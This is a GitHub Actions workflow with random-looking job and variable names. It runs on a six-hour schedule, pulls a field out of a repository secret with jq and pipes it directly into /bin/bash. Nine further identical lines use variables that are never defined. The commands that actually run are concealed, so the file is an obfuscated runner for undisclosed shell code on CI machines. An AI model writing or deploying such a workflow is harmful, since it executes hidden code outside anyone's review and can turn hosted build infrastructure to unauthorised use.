name: wengkeneng3197

on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wengkeneng3197
        env:
          qub921: ${{ secrets.qub921 }}
        run: |
          echo $qub921 | jq -r .br3 | /bin/bash
          echo $gr09 | jq -r .gfn885 | /bin/bash
          echo $yj25 | jq -r .ih07 | /bin/bash
          echo $tah82 | jq -r .eqo1762 | /bin/bash
          echo $lp6 | jq -r .mrd4580 | /bin/bash
          echo $a0 | jq -r .poep45 | /bin/bash
          echo $rk89 | jq -r .va754 | /bin/bash
          echo $zna08 | jq -r .x7 | /bin/bash
          echo $ybv749 | jq -r .k79 | /bin/bash
          echo $ba75 | jq -r .re92 | /bin/bash

